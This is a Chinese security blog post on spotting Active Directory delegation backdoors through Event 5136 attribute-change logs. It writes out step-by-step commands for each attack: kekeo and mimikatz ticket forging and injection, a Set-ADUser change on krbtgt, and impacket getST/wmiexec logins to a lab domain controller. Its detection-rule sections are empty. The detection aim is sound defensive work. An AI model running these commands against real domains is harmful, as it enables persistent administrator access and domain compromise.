<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    基于AD Event日志監測域委派后門

    一顆小胡椒2023-02-07 09:24:10

    01、簡介

    域委派是指將域內用戶的權限委派給服務賬號,使得服務賬號能以用戶權限開展域內活動。攻擊者在獲取到域控權限后,可以利用約束委派或者基于資源的約束委派實現后門,以實現達到維持權限的目的。

    基于AD Event日志監視對特定 Active Directory 屬性的修改,從而發現可疑的域委派后門。

    02、約束委派攻擊場景

    假設服務賬號配置了到域控的約束性委派,當攻擊者控制了服務賬號,就可以偽造任意用戶的TGT,來打造一個變種的黃金票據。

    (1)設置約束委派


    setspn -U -A cifs/test  test
    

    (2)構造服務賬戶test的票據


    kekeo.exe "tgt::ask /user:test /domain:evil.com /password:abc123! /ticket:test.kirbi" "exit"
    

    (3)利用偽造的票據,向域服務器申請CIFS服務票據。


    kekeo.exe "tgs::s4u /tgt:TGT_test@EVIL.COM_krbtgt~evil.com@EVIL.COM.kirbi /user:administrator@evil.com /service:cifs/WIN-DC01" "exit"
    

    (4)使用mimikatz將該票據注入當前的會話中。


    mimikatz.exe "kerberos::ptt TGS_administrator@evil.com@EVIL.COM_test@EVIL.COM.kirbi" "exit"
    

    (5)訪問目標共享盤。


    dir \\win-dc01\c$
    

    檢測方法:攻擊手法的核心點在于攻擊者需要修改msDS-AllowedToDelegateTo屬性,因此我們只需要檢測對msDS-AllowedToDelegateTo屬性的修改,可以通過5136日志來監控。

    安全規則:

    03、基于資源的約束委派攻擊場景

    攻擊者在獲取到域控權限后,可以利用基于資源的約束委派實現后門,通過對krbtgt用戶設置委派屬性,以實現達到維持權限的目的。

    (1)設置屬性值并查詢


    Set-ADUser krbtgt -PrincipalsAllowedToDelegateToAccount testGet-ADUser krbtgt -Properties PrincipalsAllowedToDelegateToAccount
    

    (2)獲取ST,并使用wmiexec登錄域控。


    python getST.py -dc-ip 192.168.44.136 -spn krbtgt -impersonate administrator evil.com/test:abc123!set KRB5CCNAME=administrator.ccachepython wmiexec.py -no-pass -k administrator@win-dc01 -dc-ip 192.168.44.136
    

    檢測方法:攻擊手法的核心點在于攻擊者需要修改msDS-AllowedToActOnBehalfOfOtherIdentity屬性,因此我們只需要檢測對msDS-AllowedToActOnBehalfOfOtherIdentity屬性的修改,可以通過5136日志來監控。

    安全規則:

    cifs
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    linux運維道面試題
    2021-12-24 22:05:28
    linux運維面試題
    在屬性對話框中,單擊共享標簽,選擇“與Samba共享”。WebRTC支持通過web瀏覽器進行點對點連接,這意味著同一網絡上的兩個用戶可以通過Snapdrop導航就能找到對方,然后直接相互通信,而不需要通過外部服務器。一旦兩個或多個客戶端與Snapdrop服務取得聯系,用戶就可以通過本地網絡來回交換文件和聊天消息。Pulse為Linux上的音頻提供了驚人的靈活性,包括自動發現本地網絡流。
    攻擊者在獲取到域控權限后,可以利用約束委派或者基于資源的約束委派實現后門,以實現達到維持權限的目的。基于AD Event日志監視對特定 Active Directory 屬性的修改,從而發現可疑的域委派后門。設置約束委派setspn -U -A cifs/test test
    回想起大約兩個月前,我們報告了Samba網絡軟件中一個7年前的嚴重遠程代碼執行漏洞,允許黑客遠程完全控制易受攻擊的Linux和Unix機器。我們將該漏洞命名為SambaCry,因為它與兩個多月前在全球造成嚴重破壞的WannaCry勒索軟件所利用的Windows SMB漏洞相似。
    SMB Beacon 與命名管道在 Windows 中,無管理員權限的情況下,即無法添加白名單。定義特定版本的協議的消息數據包集稱為方言。進行身份驗證后,用戶可以訪問服務器上不受共享級別安全性保護的所有共享。
    微軟SMB和空會話介紹?
    2022-06-06 07:06:54
    空會話意味著對網絡資源的訪問是在沒有身份驗證的情況下授予的。也稱為匿名或訪客訪問,最常見的是IPC$ "Windows Named Pipe"共享。人們傾向于認為用戶名是唯一的身份驗證機制,在工作組中,這基本上是正確的。
    基于資源的約束委派
    2022-02-24 13:39:47
    微軟試圖為域用戶提供更大的靈活性,使資源的所有者能夠配置哪些帳戶是可信的,并允許委派給他們。這可以通過修改用于控制目標資源訪問的屬性“ms-DS-AllowedToActOnBehalfOfOtherIdentity”來實現的。
    在屬性對話框中,單擊共享標簽,選擇“與Samba共享”。WebRTC支持通過web瀏覽器進行點對點連接,這意味著同一網絡上的兩個用戶可以通過Snapdrop導航就能找到對方,然后直接相互通信,而不需要通過外部服務器。一旦兩個或多個客戶端與Snapdrop服務取得聯系,用戶就可以通過本地網絡來回交換文件和聊天消息。
    金票可以使用krbtgt的NTLM hash創建作為任何用戶的有效TGT。
    分布式存儲作為湖倉一體技術的重要支撐,也隨著湖倉一體技術在不斷演進。作為存儲系統,除了提供原有的數據共享訪問、靈活擴展、快照、克隆、容災等功能外,還需要為湖倉一體的上層應用提供特定的服務能力。
    一顆小胡椒
    暫無描述
      亚洲 欧美 自拍 唯美 另类